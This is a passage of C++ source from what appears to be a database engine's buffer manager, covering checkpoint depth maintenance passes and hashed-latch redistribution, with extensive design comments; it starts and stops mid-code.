// flushing one of these "uncommitted" pages requires flushing log deferred
// undo info. We handle this ok, but technically if the long running transaction
// pulls the OB0 wayback, it might be until we generate a new log before the
//
// So handling those above cases is this method ...
// Preferred Checkpoint
// ChkPoint "Overscan" ToFlush
// ( ChkPoint | LogRec
// | - Waypoint ) Waypoint | unflushed log buffers
// OB0 | | | | |
// | | | | | | future log writes ->
// ---|---------------------|-------------|---------------------|-------------|ooooo| - - - - - - - - - - - -
// | | | |
// | |----> | |
// | Pass II: | |
// | lgposFlusherBM |---> lgposNewest
// |---------------->----> Pass I:
// Pass N: lgposVersionerBM
// OB0 Beginning
//
// We move to a mutiple passes for checkpoint. Not every pass will happen on every
// run of checkpoint depth maintenance.
//
// Pass I: Versioner
// So to mitigate pages hanging past the checkpoint that are waypoint protected, we make
// the realization that any page that has an OB0 between Preferred Checkpoint and the
// Overscan point AND has a lgposModify within the waypoint is automatically going to
// block the checkpoint from advancing to it's preferred position eventually.
//
// So we "overscan" the checkpoint, and mark such pages we visit for versioning, so that
// the older version page will not take new touches and will be flushable by the time it
// reaches the preferred checkpoint. This pass of checkpoint advancement is always
// incremental, and runs from the lgposVersionerBM to the current overscan point.
//
// This pass happens whenever at least a OB0 uncertainty / bucket has passed between
// the lgposVersionerBM and the overscan point. This means it happens pretty regularly
// and incrementally.
//
// Pass II: Flusher
// The case 3 above causes the construction of this pass. We basically track the last
// flushing / IO related push back (i.e. thinks like errBFIPageFlushed, errBFIPageFlushPending[HungIO],
// errBFIRemainingDependencies (which are flushable), errBFIDependentPurged, and
// errLatchConflict) and start there each checkpoint advancement. Pass II runs everytime
// we do checkpoint advancement.
//
// Future, it might be good to grab the Min BT0 and not allow the flusher to move beyond
// that to protect against case 4b above. Worst case we will wait until a whole log rolls
// over before we re-establish the real point the flusher should be at, this is ?probably?
// responsive enough.
//
// This pass happens everytime checkpoint advancement runs.
//
// Pass N: ReFlusher
// Since Pass II flushing moved beyond waypoint protected pages (well dependencies really),
// we will at each log roll over, start Pass N (which in the code is really implemented in
// Pass II, where we pull our Pass II start point back to the beginning of the OB0) any
// time we roll a log file (i.e. freeing up new waypoint pinned pages). Pass N also does
// the work of Pass II when it runs. Pass N has ultimate responsibility for maintaining
// the checkpoint.
//
// This pass happens ever time we move to a new transaction log.
// By the way, by resetting for pass N, we rescan from the beginning of the OB0, so we would
// like to not do this too often, if there ends up being many pages that are unflushable due
// to the waypoint. So our rate of doing this, is basically how often a new log is generated.
//
// Some common log rates of the day (dated 7/30/2006) is about 1000 / day, but here are a few
// rates I've collected over the last few years ...
//
// scenario <Jian <Jian <win-msg-10> <high est> <EFleis 50k IOPS
// test> peak> <ave> <peak> SAN load>
// logs/day - - 1000 - 4000 20k 518400
// logs/min 5 20 - 10 - - -
// e2k3 secs - - 86.4 6 21.6 4.32 .1667
// e12 secs 12 3 17.28 1.2 4.32 .864 .0333
//
// (the last two rows are time to generate a log for the two releases, where
// e12 is just 1/5th of e2k3 b/c of 5MB vs 1MB log files).
//
// Allow registry based disabling of overscanning for perf testing...
BOOL g_fBFOverscanCheckpoint = fTrue;
BOOL g_fBFEnableForegroundCheckpointMaint = fTrue;
// tries to flush all pages that are impeding the checkpoint by IFMP
//
// return codes:
// JET_errSuccess - Nothing more to do, quiesce checkpoint depth maint.
// errBFICheckpointWorkRemaining - One or more pages or dependencies are pending IO
// completion, try again later.
// errDiskTilt - Too much IO has been dispatched at once, try again
// when the IO load has dropped.
ERR ErrBFIMaintCheckpointDepthIFlushPagesByIFMP( const IFMP ifmp, BOOL * const pfUpdateCheckpoint )
{
ERR err = JET_errSuccess;
FMP* pfmp = &g_rgfmp[ ifmp ];
Assert( ifmp != ifmpNil );
Assert( pfUpdateCheckpoint );
// if no context is present, there must be no pages impeding the checkpoint
BFFMPContext* pbffmp = (BFFMPContext*)pfmp->DwBFContext();
if ( !pbffmp || !pbffmp->fCurrentlyAttached )
{
AssertSz( fFalse, "Caller should've protected us from being called when there is no pbffmp (%p), or it is not attached", pbffmp );
return JET_errSuccess;
}
// The statistics need clearing, used below ...
memset( &(pbffmp->ChkAdvData), 0, sizeof(pbffmp->ChkAdvData) );
// get the most recent log record
LOG* const plog = pfmp->Pinst()->m_plog;
// this read of m_lgposLogRec is strictly speaking unsafe, but it is OK, b/c this
// is a maintanence thread, we will either try to adv the checkpoint a bit farther
// than necessary, or not far enough ...
const LGPOS lgposNewest = plog->LgposLGLogTipNoLock();
if( 0 == CmpLgpos( lgposMin, lgposNewest ) )
{
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "CP [ifmp=0x%x]: Skipping checkpoint maintenance. fRecoveringMode = %d", (ULONG)ifmp, plog->FRecoveringMode() ) );
return err;
}
// If we move by a whole log generation we reset the flusher ...
const BOOL fActivateTheReFlusher = ( pbffmp->lgposLastLogTip.lGeneration < lgposNewest.lGeneration );
pbffmp->lgposLastLogTip = lgposNewest;
// Calculate the preferred checkpoint we would like to move to
LGPOS lgposCPD = lgposMin;
const BOOL fQuiesceCheckpoint = pfmp->Pinst()->m_fCheckpointQuiesce;
const BOOL fUrgentCheckpointUpdate = (BOOL)UlConfigOverrideInjection( 46336, fFalse ) || fQuiesceCheckpoint;
const QWORD cbCheckpointDepth = fQuiesceCheckpoint ? 0 : (QWORD)pfmp->Pinst()->m_plog->CbLGDesiredCheckpointDepth();
lgposCPD.lGeneration = (LONG)( cbCheckpointDepth / ( 1024 * (QWORD)UlParam( pfmp->Pinst(), JET_paramLogFileSize ) ) );
LGPOS lgposPreferredCheckpoint = lgposNewest;
if ( lgposNewest.lGeneration - lgposCPD.lGeneration > 0 )
{
lgposPreferredCheckpoint.lGeneration = lgposNewest.lGeneration - lgposCPD.lGeneration;
}
else
{
lgposPreferredCheckpoint = lgposMin;
}
//
// Note while the waypoint is log graunular, we're actually advancing the overscan point a little more
// incrementally because it is calcuated off the lgposPreferredCheckpoint which is based upon m_lgposLogRec.
LGPOS lgposCheckpointOverscan = lgposPreferredCheckpoint;
LGPOS lgposWaypointLatency = lgposMin;
lgposWaypointLatency.lGeneration = (LONG)UlParam( pfmp->Pinst(), JET_paramWaypointLatency );
if ( lgposWaypointLatency.lGeneration > 0 )
{
if ( lgposPreferredCheckpoint.lGeneration + lgposWaypointLatency.lGeneration < ( lgposNewest.lGeneration - ( 1 + lgposCPD.lGeneration / 5 ) ) &&
lgposPreferredCheckpoint.lGeneration + lgposWaypointLatency.lGeneration > 0 )
{
lgposCheckpointOverscan.lGeneration = lgposPreferredCheckpoint.lGeneration + lgposWaypointLatency.lGeneration;
}
// else leave overscan at checkpoint ...
// which effectively disables the overscan pass below ... whoever sets waypoint to over 80% of
// the checkpoint be warned.
}
Assert(lgposCheckpointOverscan.lGeneration >= 0 );
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "CP: Checkpoint Advancement begins [ifmp=0x%x], plan:\r\n"
"CP: lgposPreferredCheckpoint =%08x:%04x:%04x (fQuiesce = %d, fUrgent = %d)\r\n"
"CP: lgposFlusherBM =%08x:%04x:%04x\r\n"
"CP: lgposVersionerBM =%08x:%04x:%04x\r\n"
"CP: lgposCheckpointOverscan =%08x:%04x:%04x\r\n"
"CP: fActivateTheReFlusher =%s",
(ULONG)ifmp,
lgposPreferredCheckpoint.lGeneration, lgposPreferredCheckpoint.isec, lgposPreferredCheckpoint.ib, fQuiesceCheckpoint, fUrgentCheckpointUpdate,
pbffmp->lgposFlusherBM.lGeneration, pbffmp->lgposFlusherBM.isec, pbffmp->lgposFlusherBM.ib,
pbffmp->lgposVersionerBM.lGeneration, pbffmp->lgposVersionerBM.isec, pbffmp->lgposVersionerBM.ib,
lgposCheckpointOverscan.lGeneration, lgposCheckpointOverscan.isec, lgposCheckpointOverscan.ib,
fActivateTheReFlusher ? "yes" : "no"
) );
//
// Check if we need to request a flush map write.
//
CFlushMap* const pfm = pfmp->PFlushMap();
if ( pfm != NULL )
{
const QWORD ibLogTip = ( (QWORD)lgposNewest.lGeneration * pfmp->Pinst()->m_plog->CSecLGFile() + lgposNewest.isec ) * pfmp->Pinst()->m_plog->CbLGSec() + lgposNewest.ib;
const QWORD cbPreferredChktpDepth = (QWORD)UlParam( pfmp->Pinst(), JET_paramCheckpointDepthMax );
if ( pfm->FRequestFmSectionWrite( ibLogTip, cbPreferredChktpDepth ) )
{
// This call does not block waiting for the flush to complete because it issues
// I/O asynchronously. However, it may suffer some contention waiting for the chance
// to acquire write latches on the pages targeted for flushing. In most cases, the owners
// of those locks preventing entering a write latch are only doing memory operations on I/O
// issuing or completion. Asynchronous I/O against data pages is only performed from this thread
// so no worries there. Synchronous I/O against data pages may be performed in a small number of
// cases (e.g., page patching, DB shrink, DB trimming). The flush map header is probably
// the only potential root of contention because flushing the DB header holds an exclusive latch
// on the flush map header.
pfm->FlushOneSection( ibLogTip );
}
}
//
// Finally perform the passes of checkpoint maintenance based upon the above ...
//
//
// Pass I: Versioner.
//
// If there is overscanning to be done and the overscan point has made at
// least 1 bucket (based on OB0 uncertainty) of progress ...
if ( g_fBFOverscanCheckpoint &&
CmpLgpos( lgposCheckpointOverscan, lgposPreferredCheckpoint ) &&
CmpLgpos( BFIOB0Lgpos( ifmp, pbffmp->lgposVersionerBM ), BFIOB0Lgpos( ifmp, lgposCheckpointOverscan ) )
)
{
BFOB0::CLock lockOB0Pass1;
Assert( CmpLgpos( lgposCheckpointOverscan, lgposPreferredCheckpoint) > 0 );
CallS( ErrBFIOB0MaintScan( ifmp, pbffmp,
lgposMin, 0,
&lockOB0Pass1,
pbffmp->lgposVersionerBM,
&lgposCheckpointOverscan,
NULL,
BFOB0MaintOperations( bfob0moVersioning | bfob0moCleaning ) ) );
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "CP [ifmp=0x%x]: Pass 1: Versioner: start=%08x,%04x,%04x - stopBM=%08x,%04x,%04x",
(ULONG)ifmp,
pbffmp->lgposVersionerBM.lGeneration, pbffmp->lgposVersionerBM.isec, pbffmp->lgposVersionerBM.ib,
lgposCheckpointOverscan.lGeneration, lgposCheckpointOverscan.isec, lgposCheckpointOverscan.ib
) );
pbffmp->lgposVersionerBM = lgposCheckpointOverscan;
if ( FOSTraceTagEnabled( JET_tracetagBufferManagerMaintTasks ) )
{
char rgOB0Stats[lockOB0Pass1.cchStatsString];
lockOB0Pass1.SPrintStats( rgOB0Stats );
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "CP [ifmp=0x%x]: Pass 1: Versioner - OB0 Index stats: %s", (ULONG)ifmp, rgOB0Stats ) );
}
}
//
// Pass II | Pass N
//
BFOB0::CLock lockOB0Pass2N;
LGPOS lgposFlushStart;
if ( !fActivateTheReFlusher )
{
//
// Pass II: Regular Flusher.
//
lgposFlushStart = pbffmp->lgposFlusherBM;
}
else
{
//
// Pass N: ReFlusher.
//
// Rather than do incremental pass II flushing, go to pass N, and reset
// the flusher all the way to the begining of the OB0.
//
lgposFlushStart = lgposMin;
}
// flush all pages that are impeding the checkpoint
LGPOS lgposFlushStop = lgposPreferredCheckpoint; // try to goto the checkpoint.
LGPOS lgposFlushForwardProgress = lgposMin;
err = ErrBFIOB0MaintScan( ifmp, pbffmp,
lgposNewest,
cbCheckpointDepth,
&lockOB0Pass2N,
lgposFlushStart,
&lgposFlushStop ,
&lgposFlushForwardProgress,
BFOB0MaintOperations( bfob0moFlushing | bfob0moVersioning | bfob0moCleaning | ( fQuiesceCheckpoint ? bfob0moQuiescing : 0 ) ) );
Assert( CmpLgpos( lgposFlushForwardProgress, lgposMin ) );
pbffmp->lgposFlusherBM = lgposFlushForwardProgress; // record as far as we got.
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "CP [ifmp=0x%x]: Pass %c: Flusher: start=%08x,%04x,%04x - stopBM=%08x,%04x,%04x",
(ULONG)ifmp, fActivateTheReFlusher ? 'N' : '2',
lgposFlushStart.lGeneration, lgposFlushStart.isec, lgposFlushStart.ib,
lgposFlushStop.lGeneration, lgposFlushStop.isec, lgposFlushStop.ib
) );
if ( FOSTraceTagEnabled( JET_tracetagBufferManagerMaintTasks ) )
{
char rgOB0Stats[lockOB0Pass2N.cchStatsString];
lockOB0Pass2N.SPrintStats( rgOB0Stats );
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "CP [ifmp=0x%x]: Pass %c: Flusher - OB0 Index stats: %s", (ULONG)ifmp, fActivateTheReFlusher ? 'N' : '2', rgOB0Stats ) );
}
//
// Normalize any other experienced condtition during checkpoint advancement
// to an error to indicate thier is still work to do, but not b/c too many
// IOs.
//
if ( err != JET_errSuccess &&
err != errDiskTilt )
{
if ( pbffmp->ChkAdvData.cFlushErrPageFlushed ||
pbffmp->ChkAdvData.cFlushErrPageFlushPending ||
pbffmp->ChkAdvData.cFlushErrRemainingDependencies ||
pbffmp->ChkAdvData.cFlushErrDependentPurged ||
pbffmp->ChkAdvData.cFlushErrLatchConflict )
{
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks, OSFormat( "CP [ifmp=0x%x]: work remaining b/c flushes pending, dependencies, etc", (ULONG)ifmp ) );
err = ErrERRCheck( errBFICheckpointWorkRemaining );
}
else if ( err == errBFIPageTouchTooRecent )
{
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks, OSFormat( "CP [ifmp=0x%x]: success b/c errBFIPageTouchTooRecent", (ULONG)ifmp ) );
err = JET_errSuccess;
}
else
{
// Any unknown error, log full or something, just resched ...
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks, OSFormat( "CP [ifmp=0x%x]: work remaining b/c unknown errors", (ULONG)ifmp ) );
err = ErrERRCheck( errBFICheckpointWorkRemaining );
}
}
if ( err == JET_errSuccess && !fQuiesceCheckpoint && pfmp->Pinst()->m_fCheckpointQuiesce )
{
// Quiesce bit flipped to true on us while we were executing.
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks, OSFormat( "CP [ifmp=0x%x]: work remaining b/c we changed our mind on quiescing", (ULONG)ifmp ) );
err = ErrERRCheck( errBFICheckpointWorkRemaining );
}
//
// check if we have made any material progress in cleaning
//
LGPOS lgposCheckpointOB0 = lgposMin; // checkpoint as far as OB0 is concerned
BFIGetLgposOldestBegin0( ifmp, &lgposCheckpointOB0, fTrue );
if ( 0 == CmpLgpos( lgposCheckpointOB0, lgposMax ) )
{
// Setting it to lgposMin, stops us from triggering the checkpoint update, but
// ideally once the OB0 is empty like this, we would want to trigger checkpoint
// update one more time.
lgposCheckpointOB0 = lgposMin;
}
#ifdef DEBUG
else
{
const LGPOS lgposCheckpointOB0Rounded = BFIOB0Lgpos( ifmp, lgposCheckpointOB0, fFalse );
Assert( 0 == CmpLgpos( &lgposCheckpointOB0, &lgposCheckpointOB0Rounded ) ); // uncertainty should already be factored in
}
#endif
const LGPOS lgposCheckpoint = BFIOB0Lgpos( ifmp, plog->LgposLGCurrentCheckpointMayFail(), fFalse );
Assert( fUrgentCheckpointUpdate || !fQuiesceCheckpoint );
if ( fUrgentCheckpointUpdate )
{
LGPOS lgposStopT = { 0 };
ERR errT = ErrBFIOB0MaintScan( ifmp, pbffmp,
lgposNewest,
cbCheckpointDepth,
&lockOB0Pass2N,
// used to have lgposCheckpointOB0 to be specific, but lgposMin starts at beginning
lgposMin,
&lgposPreferredCheckpoint,
&lgposStopT,
bfob0moCleaning );
// Refresh our OB0 as we may have made some progress from the bfob0moCleaning ErrBFIOB0MainScan ...
lgposCheckpointOB0 = lgposMin;
BFIGetLgposOldestBegin0( ifmp, &lgposCheckpointOB0, fTrue );
if ( 0 == CmpLgpos( lgposCheckpointOB0, lgposMax ) )
{
// Setting it to lgposMin, stops us from triggering the checkpoint update, but
// ideally once the OB0 is empty like this, we would want to trigger checkpoint
// update one more time.
lgposCheckpointOB0 = lgposMin;
}
#ifdef DEBUG
else
{
const LGPOS lgposCheckpointOB0Rounded = BFIOB0Lgpos( ifmp, lgposCheckpointOB0, fFalse );
Assert( 0 == CmpLgpos( &lgposCheckpointOB0, &lgposCheckpointOB0Rounded ) ); // uncertainty should already be factored in
}
#endif
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "CPUPD: bfob0moCleaning ifmp 0x%x lgposCheckpointOB0 %s to lgposStopT %s errT = %d",
(ULONG)ifmp,
OSFormatLgpos( LGPOS( lgposCheckpointOB0 ) ),
OSFormatLgpos( LGPOS( lgposStopT ) ),
errT ) );
const BOOL fEmptyOB0 = CmpLgpos( lgposMin, lgposCheckpointOB0 ) == 0; // means we're completely clean.
if ( fEmptyOB0 ||
( CmpLgpos( lgposCheckpoint, lgposCheckpointOB0 ) < 0 ) )
{
// we have made material progress with the OB0 vs. current checkpoint ... request checkpoint update
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "CPUPD: Pushing out checkpoint for fmp 0x%x because lgposCheckpoint %s could be improved to lgposOBO %s",
(ULONG)ifmp,
OSFormatLgpos( LGPOS( lgposCheckpoint ) ),
OSFormatLgpos( LGPOS( lgposCheckpointOB0 ) ) ) );
*pfUpdateCheckpoint = fTrue;
}
if ( err == JET_errSuccess &&
lgposWaypointLatency.lGeneration == 0 && // no LLR
!fEmptyOB0 &&
lgposCheckpointOB0.lGeneration != lgposStopT.lGeneration )
{
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks, OSFormat( "CP [ifmp=0x%x]: work remaining b/c lgposCheckpointOB0 does not match lgposStopT (%d != %d)", (ULONG)ifmp, lgposCheckpointOB0.lGeneration, lgposStopT.lGeneration ) );
err = ErrERRCheck( errBFICheckpointWorkRemaining );
}
}
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "CP: Checkpoint Adv error stats: err = %d\r\n"
"CP: ifmp = 0x%x\r\n"
"CP: cEntriesVisited = %d\r\n"
"CP: cCleanRemoved = %d\r\n"
"CP: cFlushErrSuccess = %d\r\n"
"CP: cFlushErrPageFlushed = %d\r\n"
"CP: cFlushErrPageFlushPending = %d\r\n"
"CP: cFlushErrRemainingDependencies = %d\r\n"
"CP: cFlushErrDependentPurged = %d\r\n"
"CP: cFlushErrLatchConflict = %d\r\n"
"CP: cFlushErrPageTouchTooRecent = %d\r\n"
"CP: cFlushErrOther = %d\r\n"
"CP: lgposCheckpoint = %08x:%04x:%04x\r\n"
"CP: lgposCheckpointOB0 = %08x:%04x:%04x\r\n",
err,
(ULONG)ifmp,
pbffmp->ChkAdvData.cEntriesVisited,
pbffmp->ChkAdvData.cCleanRemoved,
pbffmp->ChkAdvData.cFlushErrSuccess,
pbffmp->ChkAdvData.cFlushErrPageFlushed,
pbffmp->ChkAdvData.cFlushErrPageFlushPending,
pbffmp->ChkAdvData.cFlushErrRemainingDependencies,
pbffmp->ChkAdvData.cFlushErrDependentPurged,
pbffmp->ChkAdvData.cFlushErrLatchConflict,
pbffmp->ChkAdvData.cFlushErrPageTouchTooRecent,
pbffmp->ChkAdvData.cFlushErrOther,
lgposCheckpoint.lGeneration, lgposCheckpoint.isec, lgposCheckpoint.ib,
lgposCheckpointOB0.lGeneration, lgposCheckpointOB0.isec, lgposCheckpointOB0.ib ) );
return err;
}
// Checkpoint
CSemaphore g_semMaintCheckpointRequest( CSyncBasicInfo( _T( "g_semMaintCheckpointRequest" ) ) );
TICK g_tickMaintCheckpointLast;
POSTIMERTASK g_posttBFIMaintCheckpointITask = NULL;
POSTIMERTASK g_posttBFIMaintCacheStatsITask = NULL;
POSTIMERTASK g_posttBFIMaintIdleCacheStatsITask = NULL;
// requests that checkpoint maintenance be performed on behalf of dirty pages
// in the cache
void BFIMaintCheckpointRequest()
{
// try to acquire the right to request checkpoint maintenance
BOOL fAcquiredAsync = g_semMaintCheckpointRequest.FTryAcquire();
// if we acquired the right to maintain the checkpoint, then we will try
// to do so
if ( fAcquiredAsync )
{
// schedule a task to maintain the checkpoint
if ( ErrBFIMaintScheduleTask( g_posttBFIMaintCheckpointITask, NULL, dtickMaintCheckpointDelay, dtickMaintCheckpointFuzz ) >= JET_errSuccess )
{
// we have now lost our right to make async requests
fAcquiredAsync = fFalse;
}
}
// if we own the right to make async maintenance requests then
// we no longer need it
if ( fAcquiredAsync )
{
Assert( g_semMaintCheckpointRequest.CAvail() == 0 );
g_semMaintCheckpointRequest.Release();
}
}
#ifdef DEBUG
LONG g_cSingleThreadedCheckpointTaskCheck = 0;
#endif
// executes an async request to perform checkpoint maintenance
void BFIMaintCheckpointITask( VOID * pvGroupContext, VOID * pvRuntimeContext )
{
OSTrace( JET_tracetagBufferManagerMaintTasks, __FUNCTION__ );
OnDebug( LONG cBegin = AtomicIncrement( &g_cSingleThreadedCheckpointTaskCheck ) );
Expected( cBegin == 1 ); // OS layer timer task infra protects us from this
// this task automatically has the right to async maintenance
BOOL fAcquiredAsync = fTrue;
// maintain our checkpoint
BFIMaintCheckpointIUpdate();
// remember the time when we last maintained the checkpoint
g_tickMaintCheckpointLast = TickOSTimeCurrent();
// if we own the right to make async maintenance requests then
// we no longer need it
if ( fAcquiredAsync )
{
Assert( g_semMaintCheckpointRequest.CAvail() == 0 );
g_semMaintCheckpointRequest.Release();
}
OnDebug( LONG cEnd = AtomicDecrement( &g_cSingleThreadedCheckpointTaskCheck ) );
Assert( cEnd == 0 ); // OS layer timer task infra protects us from this
}
// updates the checkpoints for the specified instance
void BFIMaintCheckpointIUpdateInst( const size_t ipinst )
{
extern CRITPOOL< INST* > g_critpoolPinstAPI;
CCriticalSection *pcritInst = &g_critpoolPinstAPI.Crit(&g_rgpinst[ipinst]);
pcritInst->Enter();
INST *pinst = g_rgpinst[ ipinst ];
if ( pinstNil == pinst )
{
pcritInst->Leave();
return;
}
// Use APILock to exclude the initializing and
// terminating an instance.
const BOOL fAPILocked = pinst->APILock( pinst->fAPICheckpointing );
pcritInst->Leave();
if ( fAPILocked )
{
if ( pinst->m_fJetInitialized )
{
(void)pinst->m_plog->ErrLGUpdateCheckpointFile( fFalse );
}
pinst->APIUnlock( pinst->fAPICheckpointing );
}
}
// updates the checkpoints for every instance currently in use
void BFIMaintCheckpointIUpdate()
{
for ( size_t ipinst = 0; ipinst < g_cpinstMax; ipinst++ )
{
BFIMaintCheckpointIUpdateInst( ipinst );
}
}
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// Hashed Latches
const BOOL g_fBFMaintHashedLatches = fFalse; // permanently disabled
size_t g_icReqOld = 0;
size_t g_icReqNew = 1;
ULONG g_rgcReqSystem[ 2 ];
ULONG g_dcReqSystem;
// preserves numerical separation so tickEligibleForNomination, tickViewLastRefreshed, and
// iHashedLatch can all share the same storage.
TICK TickBFIHashedLatchTime( const TICK tickIn )
{
// iHashedLatch shares storage with tickEligibleForNomination, and as such a tick could
// be misinterpreted as a hashed latch. To avoid any potential headache here, because
// the valid iHashedLatch values are such a tiny part of the number space, we simply shift
// around this inconclusive area of the number space for ticks.
return ( tickIn < (ULONG)cBFHashedLatch ) ? ( cBFHashedLatch + 1 ) : tickIn;
}
// executes an async request to maintain our hashed latches
void BFIMaintHashedLatchesITask( DWORD_PTR )
{
OSTrace( JET_tracetagBufferManagerHashedLatches, __FUNCTION__ );
Enforce( g_fBFMaintHashedLatches );
// Ex12 Beta 2: disable hashed latches by default and allow them to be
// re-enabled via a registry key that we query once per second. this is
// being done because we reviewed the BF code and it seems that there are
// some timing holes in how these latches are used that may be causing
// some of the unexplained behavior we have been seeing related to page
// dependencies and data corruption. we will investigate the locking
// scheme in Ex12 RTM
WCHAR wszBuf[ 16 ] = { 0 };
BOOL fEnableHashedLatches = fFalse;
if ( FOSConfigGet( L"BF", L"Enable Hashed Latches", wszBuf, sizeof( wszBuf ) ) &&
wszBuf[ 0 ] )
{
fEnableHashedLatches = !!_wtol( wszBuf );
}
// redistribute our hashed latches for the next period
if ( fEnableHashedLatches )
{
BFIMaintHashedLatchesIRedistribute();
}
}
// automatically redistributes the hashed latches to the BFs containing the
// hottest page data in the cache
void BFIMaintHashedLatchesIRedistribute()
{
const size_t cProc = OSSyncGetProcessorCountMax();
size_t iProc;
size_t iNominee;
size_t iHashedLatch;
ULONG rgdcReqNomineeSum[ cBFNominee ];
ULONG rgdcReqNomineeMax[ cBFNominee ];
ULONG rgdcReqHashedLatchSum[ cBFHashedLatch ];
ULONG dcReqHashedLatchTotal;
size_t iNomineeWinner;
ULONG dcReqNomineeSumWinner;
size_t iHashedLatchLoser;
ULONG dcReqHashedLatchSumLoser;
PBF pbfElect;
PBF pbfLoser;
PBF pbfWinner;
// collect the raw latch counts for the system, the nominee elect, each
// nominee, and each hashed latch
PERFOpt( g_rgcReqSystem[ g_icReqNew ] = cBFCacheReq.Get( perfinstGlobal ) );
for ( iProc = 0; iProc < cProc; iProc++ )
{
PLS* const ppls = Ppls( iProc );
for ( iNominee = 0; iNominee < cBFNominee; iNominee++ )
{
ppls->rgcreqBFNominee[ g_icReqNew ][ iNominee ] = ppls->rgBFNominee[ iNominee ].cCacheReq;
}
for ( iHashedLatch = 0; iHashedLatch < cBFHashedLatch; iHashedLatch++ )
{
ppls->rgcreqBFHashedLatch[ g_icReqNew ][ iHashedLatch ] = ppls->rgBFHashedLatch[ iHashedLatch ].cCacheReq;
}
}
// compute the latch count for the sampling interval for the above data
g_dcReqSystem = g_rgcReqSystem[ g_icReqNew ] - g_rgcReqSystem[ g_icReqOld ];
for ( iProc = 0; iProc < cProc; iProc++ )
{
PLS* const ppls = Ppls( iProc );
for ( iNominee = 0; iNominee < cBFNominee; iNominee++ )
{
ppls->rgdcreqBFNominee[ iNominee ] = ppls->rgcreqBFNominee[ g_icReqNew ][ iNominee ] - ppls->rgcreqBFNominee[ g_icReqOld ][ iNominee ];
}
for ( iHashedLatch = 0; iHashedLatch < cBFHashedLatch; iHashedLatch++ )
{
ppls->rgdcreqBFHashedLatch[ iHashedLatch ] = ppls->rgcreqBFHashedLatch[ g_icReqNew ][ iHashedLatch ] - ppls->rgcreqBFHashedLatch[ g_icReqOld ][ iHashedLatch ];
}
}
// swap old and new data sets for the next data collection cycle
g_icReqOld = g_icReqOld ^ 1;
g_icReqNew = g_icReqNew ^ 1;
// cook the latch count data to support our decision making
for ( iNominee = 0; iNominee < cBFNominee; iNominee++ )
{
rgdcReqNomineeSum[ iNominee ] = 0;
rgdcReqNomineeMax[ iNominee ] = 0;
}
for ( iHashedLatch = 0; iHashedLatch < cBFHashedLatch; iHashedLatch++ )
{
rgdcReqHashedLatchSum[ iHashedLatch ] = 0;
}
for ( iProc = 0; iProc < cProc; iProc++ )
{
PLS* const ppls = Ppls( iProc );
for ( iNominee = 0; iNominee < cBFNominee; iNominee++ )
{
rgdcReqNomineeSum[ iNominee ] += ppls->rgdcreqBFNominee[ iNominee ];
rgdcReqNomineeMax[ iNominee ] = max( rgdcReqNomineeMax[ iNominee ], ppls->rgdcreqBFNominee[ iNominee ] );
}
for ( iHashedLatch = 0; iHashedLatch < cBFHashedLatch; iHashedLatch++ )
{
rgdcReqHashedLatchSum[ iHashedLatch ] += ppls->rgdcreqBFHashedLatch[ iHashedLatch ];
}
}
dcReqHashedLatchTotal = 0;
for ( iHashedLatch = 0; iHashedLatch < cBFHashedLatch; iHashedLatch++ )
{
dcReqHashedLatchTotal += rgdcReqHashedLatchSum[ iHashedLatch ];
}
// choose the winning nominee as follows:
// - it doesn't have a majority of its latches on one processor
// - it has the highest latch count of qualifying nominees
iNomineeWinner = 0;
dcReqNomineeSumWinner = 0;
for ( iNominee = 1; iNominee < cBFNominee; iNominee++ )
{
const PBF pbfNominee = Ppls( 0 )->rgBFNominee[ iNominee ].pbf;
if ( pbfNominee != pbfNil &&
rgdcReqNomineeMax[ iNominee ] < pctProcAffined * rgdcReqNomineeSum[ iNominee ] &&
dcReqNomineeSumWinner < rgdcReqNomineeSum[ iNominee ] )
{
iNomineeWinner = iNominee;
dcReqNomineeSumWinner = rgdcReqNomineeSum[ iNominee ];
}
}
// choose the hashed latch with the smallest latch count as the loser
iHashedLatchLoser = 0;
dcReqHashedLatchSumLoser = ULONG( ~0 );
for ( iHashedLatch = 0; iHashedLatch < cBFHashedLatch; iHashedLatch++ )
{
if ( dcReqHashedLatchSumLoser > rgdcReqHashedLatchSum[ iHashedLatch ] )
{
iHashedLatchLoser = iHashedLatch;
dcReqHashedLatchSumLoser = rgdcReqHashedLatchSum[ iHashedLatch ];
}
}
// we will promote the nominee elect if:
// - it doesn't have a majority of its latches on one processor
// - its latch count exceeds the latch count of the loser
// - we can try acquire the X Latch on the nominee elect and the loser
// - we can demote the loser to a normal latch
pbfElect = Ppls( 0 )->rgBFNominee[ 0 ].pbf;
pbfLoser = Ppls( 0 )->rgBFHashedLatch[ iHashedLatchLoser ].pbf;
if ( pbfElect != pbfNil &&
rgdcReqNomineeMax[ 0 ] < pctProcAffined * rgdcReqNomineeSum[ 0 ] &&
rgdcReqNomineeSum[ 0 ] > dcReqHashedLatchSumLoser )
{
if ( pbfElect->sxwl.ErrTryAcquireExclusiveLatch() == CSXWLatch::ERR::errSuccess )
{
if ( pbfLoser == pbfNil ||
pbfLoser->sxwl.ErrTryAcquireExclusiveLatch() == CSXWLatch::ERR::errSuccess )
{
if ( pbfLoser == pbfNil || FBFILatchDemote( pbfLoser ) )
{
for ( iProc = 0; iProc < cProc; iProc++ )
{
PLS* const ppls = Ppls( iProc );
ppls->rgBFNominee[ 0 ].pbf = pbfNil;
ppls->rgBFHashedLatch[ iHashedLatchLoser ].pbf = pbfElect;
}
pbfElect->iHashedLatch = iHashedLatchLoser;
pbfElect->bfls = bflsHashed;
if ( pbfLoser != pbfNil )
{
OSTrace(
